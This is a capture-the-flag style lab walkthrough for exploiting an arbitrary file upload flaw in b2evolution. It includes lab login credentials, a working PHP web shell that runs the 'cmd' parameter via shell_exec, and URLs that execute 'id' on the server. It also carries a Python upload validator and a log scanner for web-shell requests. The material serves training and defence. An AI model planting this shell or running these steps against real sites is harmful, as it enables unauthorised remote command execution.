Walkthrough 27

The document outlines steps to exploit a file upload vulnerability in B2Evolution to upload a PHP web shell, find its location on the server, and execute system commands through it. It involves logging into the vulnerable web app, uploading a shell, finding where files are stored, and accessing the shell to run commands.

Uploaded by

kevin

Name B2Evolution

URL https://www.attackdefense.com/challengedetails?cid=27

Type Real World Webapps : File Upload

Important Note: This document illustrates all the important steps required to complete this lab.
This is by no means a comprehensive step-by-step solution for this exercise. This is only
provided as a reference to various commands needed to complete this exercise and for your
further research on this topic. Also, note that the IP addresses and domain names might be
different in your lab.

Solution:

Step 1: Inspect the web application.


Step 2: Search on Google for “B2Evolution file upload” and look for publicly available exploits.

The Exploit-DB entry contains the steps to be followed in order to exploit the vulnerability.

Exploit-DB Link: https://www.exploit-db.com/exploits/41011


Step 3: The user has to authenticate in order to exploit the vulnerability. Log in to the web
application and navigate to the URL provided in the Exploit-DB entry.

Click on the “Log in” button in the top right corner and log in to the web application. The login
credentials of the web application are provided in the challenge description.

● Username: admin
● Password: zMWWcUrwdNB

Admin Dashboard:
Navigate to the vulnerable web page.

URL:
http://16cyp8fom8zkvgfpt897ok1ed.asia.attackdefenselabs.com/index.php/a/extended-post
Scroll down to the comment section.

Step 4: Create a PHP web shell.

Save the following PHP script as “shell.php”:

<?php
// Run the value of the "cmd" GET parameter as a shell command on the server
$output = shell_exec($_GET["cmd"]);
// Return the command output to the browser inside a <pre> block
echo "<pre>$output</pre>";
?>

Command: cat ~/Downloads/shell.php


Step 5: Click on the “Choose File” button and upload the PHP web shell.

Click on the “Preview/Add file” button.


Preview:

Open the hyperlink “shell.php” in a new tab.

The content of the PHP file is displayed on the web page. A script processes the uploaded file and
displays its content. The uploaded PHP web shell is stored somewhere on the web server.

The path parameter has the value “comments/p19/shell.php”.

Step 6: Find the location of the uploaded file.

Scroll down, upload an image and find the location where the image is stored on the web
server.
Click on the “Choose File” button and upload an image.
Click on the “Preview/Add file” button.
Right-click on the image and open it in a new tab.

The image is stored in the directory “media/users/admin/comments/p19” on the web server.

Since the path parameter had the value “comments/p19/shell.php”, it can be concluded that
the uploaded files are stored in the directory “media/users/admin/comments/p19” on the web
server.
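The root cause here is that the comment-attachment handler accepts a file whose name ends in .php, keeps that name, and stores it under the web root where the PHP handler will execute it. As an added example (not code from the lab or from b2evolution), the following Python upload validator shows the checks a defender would want in such a handler: a short allowlist of extensions, a magic-byte check on the content, a scan for embedded PHP tags, and a random stored name so the client-supplied filename never reaches the filesystem. The allowlist, size limit and helper names are assumptions for the example.

```python
import os
import secrets

# Allowlisted attachment extensions, each with the magic bytes the content must
# start with (assumed policy for the example: images only).
ALLOWED_TYPES = {
    "png": [b"\x89PNG\r\n\x1a\n"],
    "jpg": [b"\xff\xd8\xff"],
    "jpeg": [b"\xff\xd8\xff"],
    "gif": [b"GIF87a", b"GIF89a"],
}

MAX_SIZE = 2 * 1024 * 1024  # assumed 2 MiB limit for a comment attachment


class UploadRejected(ValueError):
    """Raised when an upload fails validation."""


def validate_upload(original_name: str, data: bytes) -> str:
    """Validate an attachment and return the random name it should be stored as.

    Only the allowlisted extension survives from the client-supplied name, so
    "shell.php" can never be written to disk under that name.
    """
    if len(data) == 0 or len(data) > MAX_SIZE:
        raise UploadRejected("empty or oversized upload")

    # Use only the final extension, lower-cased: "shell.php" -> "php" (rejected),
    # "shell.php.png" -> "png" (the random stored name drops the rest anyway).
    ext = os.path.splitext(os.path.basename(original_name))[1].lstrip(".").lower()
    if ext not in ALLOWED_TYPES:
        raise UploadRejected(f"extension not allowed: {ext or '(none)'}")

    # The bytes must actually look like the claimed image type, so PHP source
    # renamed to .png is rejected as well.
    if not any(data.startswith(magic) for magic in ALLOWED_TYPES[ext]):
        raise UploadRejected("content does not match extension")

    # Defence in depth: a file with valid image magic can still carry PHP code
    # (a polyglot), so refuse anything containing a PHP open tag.
    if b"<?php" in data or b"<?=" in data:
        raise UploadRejected("embedded PHP tag")

    return f"{secrets.token_hex(16)}.{ext}"


def upload_verdict(original_name: str, data: bytes) -> tuple:
    """Wrap validate_upload for callers that prefer a result over an exception.

    Returns ("accepted", stored_name) or ("rejected", reason).
    """
    try:
        return ("accepted", validate_upload(original_name, data))
    except UploadRejected as exc:
        return ("rejected", str(exc))


def store_upload(original_name: str, data: bytes, upload_root: str) -> str:
    """Validate and write the file with O_EXCL so an existing file is never replaced.

    upload_root is assumed to be a directory outside the document root that is
    served back through a static handler with PHP execution disabled.
    """
    stored_name = validate_upload(original_name, data)
    dest = os.path.join(upload_root, stored_name)
    fd = os.open(dest, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o640)
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)
    return dest


if __name__ == "__main__":
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32          # constructed PNG header
    print(upload_verdict("shell.php", b"<?php echo 1; ?>"))
    print(upload_verdict("cat.png", png))
```

Even with these checks in place, the upload directory should be served with script execution disabled (for Apache, a `php_flag engine off` or `RemoveHandler` in that directory's configuration), so that a validation bypass still cannot turn an upload into code execution.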

Step 7: Access the uploaded web shell.

URL:
http://16cyp8fom8zkvgfpt897ok1ed.asia.attackdefenselabs.com/media/users/admin/comments/p19/shell.php

No output is returned since the cmd parameter was not passed.


Step 8: Execute system commands through the “cmd” GET parameter.

Command: id

URL:
http://16cyp8fom8zkvgfpt897ok1ed.asia.attackdefenselabs.com/media/users/admin/comments/p19/shell.php?cmd=id

The “id” command was executed on the web server and its output was displayed on the web
page.
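Both the Step 7 and Step 8 requests leave a distinctive trace in the web server's access log: a request for a script extension under the static media directory, and then the same path with a command parameter. As an added example (not part of the lab), the following Python detection logic parses Apache combined-log lines and flags exactly that pattern; the log lines are constructed for the example, and the directory prefixes, extension list and parameter names are assumptions that would be tuned to a real deployment.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines (not taken from the lab): a normal image fetch,
# the two shell requests from Steps 7 and 8, a normal page view, and a failed
# probe for another script extension.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2024:10:01:02 +0000] "GET /media/users/admin/comments/p19/cat.png HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Mar/2024:10:01:09 +0000] "GET /media/users/admin/comments/p19/shell.php HTTP/1.1" 200 11 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Mar/2024:10:01:15 +0000] "GET /media/users/admin/comments/p19/shell.php?cmd=id HTTP/1.1" 200 73 "-" "Mozilla/5.0"
10.0.0.7 - - [12/Mar/2024:10:02:00 +0000] "GET /index.php/a/extended-post HTTP/1.1" 200 23011 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Mar/2024:10:02:30 +0000] "POST /media/users/bob/comments/p3/img.phtml HTTP/1.1" 404 190 "-" "curl/8.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Directories that should only ever serve static uploads (assumed layout).
UPLOAD_PREFIXES = ("/media/",)
# Extensions the PHP handler would execute if a file with that name is reached.
EXEC_EXTS = (".php", ".phtml", ".php5", ".phar")
# Query parameter names simple web shells commonly use to carry a command.
SHELL_PARAMS = {"cmd", "c", "exec", "command"}


def classify_request(line: str):
    """Return an alert dict for a script request under an upload directory, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    path = parts.path.lower()
    if not path.startswith(UPLOAD_PREFIXES):
        return None
    # Check every segment, not just the last one: with mod_php a request for
    # /media/x/shell.php/anything still executes shell.php via PATH_INFO.
    if not any(seg.endswith(EXEC_EXTS) for seg in path.split("/")):
        return None
    params = sorted(SHELL_PARAMS & set(parse_qs(parts.query)))
    return {
        "ip": m.group("ip"),
        "ts": m.group("ts"),
        "method": m.group("method"),
        "path": parts.path,
        "status": int(m.group("status")),
        "params": params,
        # A command parameter on a script under the upload tree is the
        # strongest signal; the bare script request (even a 404) is still
        # worth an alert because it shows the attacker probing for the file.
        "severity": "high" if params else "medium",
    }


def scan_log(text: str) -> list:
    """Run classify_request over every line and keep the alerts."""
    alerts = []
    for line in text.splitlines():
        alert = classify_request(line)
        if alert:
            alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for a in scan_log(SAMPLE_LOG):
        print(f'{a["severity"]:6} {a["ip"]} {a["method"]} {a["path"]} params={a["params"]} status={a["status"]}')
```

The successful requests in the sample are the ones to act on first: a 200 for a .php file under the media tree means the file both exists and was executed, so the response to that alert is to pull the file from disk, check who uploaded it (the p19 directory ties it to a comment on post 19 by the admin account) and review what commands were run.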

References:

1. b2evolution (https://b2evolution.net/)
2. b2evolution 6.8.2 - Arbitrary File Upload (https://www.exploit-db.com/exploits/41011)